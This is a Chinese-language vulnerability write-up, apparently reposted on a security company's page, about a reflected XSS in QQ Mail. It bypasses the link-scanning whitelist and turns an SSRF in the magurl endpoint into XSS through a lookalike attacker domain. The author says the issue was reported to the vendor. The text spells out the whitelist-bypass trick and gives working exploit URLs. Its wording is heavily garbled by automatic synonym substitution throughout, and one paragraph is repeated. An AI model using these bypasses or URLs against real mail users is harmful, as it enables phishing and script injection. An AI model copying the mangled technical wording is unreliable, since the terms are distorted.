|
|
|
联系客服020-83701501

QQ邮箱反射型xss漏洞

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
QQ邮箱反射型xss缝隙

作者:?Pirogue

原由

甲方“1个人的平安部”的时候,1个研发的同事在筹算1项报表效用时,由于遭到邮箱的平安制约无法很好的完成,是以将情况应声给我。说诳言,我对阅读器的平安也不太理解,案头的书翻了几页就没再动过,是以对比了腾讯邮箱的做法,创作发明显这个xss。

后台

公司使用coremail搭建企业邮箱,斥地做了1个通过邮件发送html报表的周报,但在此邮件内有链接地址。邮箱的域名是a.com,而报表中的链接是b.com,当用户打开a.com内的报表邮件,点击此中的链接;由于邮件的形式是通过iframe来加载html报表,同时coremail将iframe加入了形式平安战略(CSP)制约(sandbox=“allow-same-origin allow-popups”)。以是,点击链接虽然梗概跳转到b.com,但b.com页面有js剧本,sandbox不批准实行剧本(allow-scripts),会导致新打开的链接不会加载剧本实行,成果虽然也不是斥地想要的成果了。

Default
1 虽然通过让厂商修正iframe的sandbox属性,改为sandbox=”allow-same-origin allow-popups allow-popups-to-escape-sandbox”,便可操持这个题目,但会影响邮箱的平安性。

是以我打开qq邮箱,创作发明QQ邮箱并无这个iframe战略,而是通过1个3方“云端平安检测”,对邮件内毗连进行拦挡,提醒用户要拜访的页面大概有危害。

被src回绝的“逻辑缝隙”

是以多打开了几封QQ邮件,点击了邮件内的链接,创作发明腾讯对智联招聘、拉钩等招聘网站的链接不会进行拦挡,直接放行跳转,以是这此中能否存在1定的逻辑绕过呢?

测试过程就省略了,说结果吧,个人认为验证逻辑上仍是有些题目:

当邮件形式出现链接时,点击跳转,默认QQ邮箱会进行在云端进行拦挡检测。然而会有白名单机制,比方 http://www.lagou.com ,会把拉钩的招聘链接进行放行,云端平安检测检->进行跳转放行,无任何提醒。

  • 现有的逻辑如下:https://www.lagou.com 不放行(由于https,非白名单)www.lagou.com 不放行(不带有http,非白名单)http://xss.pirogue.org 不放行(非白名单)等等另外域名都不放行。

但当第1行是http://www.lagou.com ,第二行的链接城市放行(拆除色情或被告密的网址)。

比方:

两个链接城市进行跳转。

假定第1个是http://www.lagou.com ,第二行的网址是1个垂纶或挂马的链接,却没有被告密。那用户便大概会遭到进犯。

但此ssrf制约了域名,比方.qq.com,.soso.com,等等腾讯人人的域名。以是除非你能再挖到腾讯人人的域名下的缝隙来讲合使用。然而咱们还梗概测试1下能否梗概绕过域名的白名单机制。

鸡肋ssrf变身反射型xss

ssrf缝隙

  • 原效用链接:

https://mail.qq.com/cgi-bin/magurl?sid=e6tvxdAtN0XOUGoz&act=rep&url=http://x.soso.com/js/xf/xflib2.0.js

这个cgi读取到了js的形式

ssrf

  • 缝隙截图:

https://mail.qq.com/cgi-bin/magurl?sid=e6tvxdAtN0XOUGoz&act=rep&url=http://ip.qq.com/

ssrf

但此ssrf制约了域名,比方.qq.com,.soso.com,等等腾讯人人的域名。以是除非你能再挖到腾讯人人的域名下的缝隙来讲合使用。然而咱们还梗概测试1下能否梗概绕过域名的白名单机制。

反射型xss缝隙

是以我构造了如下的url,战败绕过了白名单,提交了此缝隙:

  • 构造的恶意链接:
    http://mail.qq.com.pirogue.org/qq.com.html
    形式如下:ssrf
  • Exp:https://mail.qq.com/cgi-bin/magurl?sid=e6tvxdAtN0XOUGoz&act=rep&url=http://mail.qq.com.pirogue.org/qq.com.htmlssrf

卖命看url链接皮相存在1个sid,在其后的tsrc自测时创作发明,此sid只能是收件人的sid手段触发缝隙。额,有点self-xss的意思咯。但tsrc仍是根据大概的侵扰进犯程度,给了缝隙中危的回复。

结语

之前在搞1个目标的时候还挖到了1个QQ企业邮箱的存储型xss,但那个存储型xss没啥技能含量,而这个反射的原由到结果仍是挺有趣的,以是坚如盘石的想分享给人人。

作者:?Pirogue

数安新闻+更多

证书相关+更多